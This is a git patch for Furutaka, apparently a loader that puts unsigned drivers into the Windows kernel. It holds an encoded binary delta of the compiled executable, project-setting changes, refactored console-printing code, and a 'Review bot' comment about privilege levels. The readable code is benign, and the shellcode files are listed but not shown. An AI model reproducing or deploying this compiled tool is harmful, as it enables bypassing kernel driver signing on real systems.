From 7e4aec975f9c7260b54604e9434cb7f63cfb5d18 Mon Sep 17 00:00:00 2001
From: hfiref0x
Date: Mon, 17 Apr 2017 18:45:41 +0700
Subject: [PATCH] v 1.1.0 small update
---
 .gitattributes | 17 -
 Compiled/Furutaka.exe | Bin 97792 -> 97792 bytes
 README.md | 2 +-
 Source/Furutaka/Furutaka.sln | 2 +-
 Source/Furutaka/Furutaka.vcxproj | 81 +-
 Source/Furutaka/Furutaka.vcxproj.user | 8 -
 Source/Furutaka/cui.c | 113 ++-
 Source/Furutaka/cui.h | 31 +-
 Source/Furutaka/global.h | 6 +-
 Source/Furutaka/instdrv.c | 279 +++---
 Source/Furutaka/instdrv.h | 49 +-
 Source/Furutaka/main.c | 1147 +++++++++++++------------
 Source/Furutaka/resource.rc | Bin 4978 -> 5702 bytes
 Source/Furutaka/shellcode.h | 186 ++--
 Source/Furutaka/sup.c | 534 ++++++------
 Source/Furutaka/sup.h | 48 +-
 TDL.sha256 | 40 +-
 17 files changed, 1248 insertions(+), 1295 deletions(-)
 delete mode 100644 .gitattributes
diff --git a/.gitattributes b/.gitattributes
deleted file mode 100644
index bdb0cab..0000000
--- a/.gitattributes
+++ /dev/null
@@ -1,17 +0,0 @@
-# Auto detect text files and perform LF normalization
-* text=auto
-
-# Custom for Visual Studio
-*.cs diff=csharp
-
-# Standard to msysgit
-*.doc diff=astextplain
-*.DOC diff=astextplain
-*.docx diff=astextplain
-*.DOCX diff=astextplain
-*.dot diff=astextplain
-*.DOT diff=astextplain
-*.pdf diff=astextplain
-*.PDF diff=astextplain
-*.rtf diff=astextplain
-*.RTF diff=astextplain
diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 0c6dfa369f1f6602475a2c4984fb0a6527581328..348832ed0a1045401158f57986483f541c339c24 100644 GIT binary patch delta 11370 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 delta 11281 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 - - Debug - Win32 - - - Release - Win32 - Debug x64 
@@ -26,19 +18,6 @@ Furutaka - - Application - true - v140 - Unicode - - - Application - false - v140 - true - Unicode - Application true @@ -57,12 +36,6 @@ - - - - - - @@ -70,20 +43,10 @@ - - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - - false - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ AllRules.ruleset @@ -93,23 +56,6 @@ NativeRecommendedRules.ruleset false - - - - - Level4 - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - - - Console - true - TDLMain - RequireAdministrator - - @@ -124,30 +70,7 @@ Console true TDLMain - RequireAdministrator - - - - - Level4 - - - MaxSpeed - true - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - true - - - Console - true - true - true - TDLMain - true - RequireAdministrator + AsInvoker @@ -164,6 +87,8 @@ true true false + Guard + MultiThreaded Console diff --git a/Source/Furutaka/Furutaka.vcxproj.user b/Source/Furutaka/Furutaka.vcxproj.user index 8f42863..b67d65e 100644 --- a/Source/Furutaka/Furutaka.vcxproj.user +++ b/Source/Furutaka/Furutaka.vcxproj.user @@ -4,14 +4,6 @@ C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys WindowsLocalDebugger - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys - WindowsLocalDebugger - - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys - WindowsLocalDebugger - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys WindowsLocalDebugger diff --git a/Source/Furutaka/cui.c b/Source/Furutaka/cui.c index 39f6777..49d9770 100644 --- a/Source/Furutaka/cui.c +++ b/Source/Furutaka/cui.c 
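Review bot: The @@ -124,30 +70,7 @@ hunk drops the manifest's requested execution level from `RequireAdministrator` to `AsInvoker`, yet the SCM path in instdrv.c still opens the manager with `SC_MANAGER_ALL_ACCESS` and calls `CreateService`, which only succeed in an elevated process. With `AsInvoker` a non-elevated launch no longer triggers the UAC prompt and instead fails inside `OpenSCManager` with an access-denied error that the callers in this diff collapse into a bare `return FALSE`, so the entry point (not in this view) should test for elevation up front and print a specific message, or the level should stay `RequireAdministrator`. The element names are inferred here because the XML markup was stripped in this rendering. The `Guard` and `MultiThreaded` additions in the @@ -164,6 +87,8 @@ hunk (CFG and static CRT) are reasonable hardening and need no change.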
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-* (C) COPYRIGHT AUTHORS, 2016
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
 *
 * TITLE: CUI.C
 *
-* VERSION: 1.00
+* VERSION: 1.10
 *
-* DATE: 18 Jan 2016
+* DATE: 20 Mar 2017
 *
 * Console output.
 *
@@ -19,46 +19,95 @@ #include "global.h" /* -* cuiPrintText +* cuiPrintTextA * * Purpose: * * Output text to the console or file. * +* ANSI variant +* */ -VOID cuiPrintText( - _In_ HANDLE hOutConsole, - _In_ LPWSTR lpText, - _In_ BOOL ConsoleOutputEnabled, - _In_ BOOL UseReturn - ) +VOID cuiPrintTextA( + _In_ HANDLE hOutConsole, + _In_ LPSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +) { - SIZE_T consoleIO; - DWORD bytesIO; - LPWSTR Buffer; + SIZE_T consoleIO; + DWORD bytesIO; + LPSTR Buffer; - if (lpText == NULL) - return; + if (lpText == NULL) + return; - consoleIO = _strlen(lpText); - if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) - return; + consoleIO = _strlen_a(lpText); + if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) + return; - consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL); - Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO); - if (Buffer) { + consoleIO = (5 + consoleIO); + Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); + if (Buffer) { - _strcpy(Buffer, lpText); - if (UseReturn) _strcat(Buffer, TEXT("\r\n")); + _strcpy_a(Buffer, lpText); + if (UseReturn) _strcat_a(Buffer, "\r\n"); - consoleIO = _strlen(Buffer); + consoleIO = _strlen_a(Buffer); - if (ConsoleOutputEnabled == TRUE) { - WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - else { - WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); - } - RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer); - } + if (ConsoleOutputEnabled != FALSE) { + WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); + } + else { + WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL); + } + HeapFree(GetProcessHeap(), 0, Buffer); + } +} + +/* +* cuiPrintTextW +* +* Purpose: +* +* Output text to the console or file. 
+* +* UNICODE variant +* +*/ +VOID cuiPrintTextW( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +) +{ + SIZE_T consoleIO; + DWORD bytesIO; + LPWSTR Buffer; + + if (lpText == NULL) + return; + + consoleIO = _strlen(lpText); + if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) + return; + + consoleIO = (5 + consoleIO) * sizeof(WCHAR); + Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); + if (Buffer) { + + _strcpy(Buffer, lpText); + if (UseReturn) _strcat(Buffer, TEXT("\r\n")); + + consoleIO = _strlen(Buffer); + + if (ConsoleOutputEnabled != FALSE) { + WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); + } + else { + WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); + } + HeapFree(GetProcessHeap(), 0, Buffer); + } } diff --git a/Source/Furutaka/cui.h b/Source/Furutaka/cui.h index a2ded5f..3412d3a 100644 --- a/Source/Furutaka/cui.h +++ b/Source/Furutaka/cui.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: CUI.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 18 Jan 2016 +* DATE: 04 Feb 2017 * * Common header file for console ui. * @@ -18,11 +18,22 @@ *******************************************************************************/ #pragma once -#include "global.h" +VOID cuiPrintTextA( + _In_ HANDLE hOutConsole, + _In_ LPSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +); -VOID cuiPrintText( - _In_ HANDLE hOutConsole, - _In_ LPWSTR lpText, - _In_ BOOL ConsoleOutputEnabled, - _In_ BOOL UseReturn - ); +VOID cuiPrintTextW( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +); + +#ifdef UNICODE +#define cuiPrintText cuiPrintTextW +#else +#define cuiPrintText cuiPrintTextA +#endif 
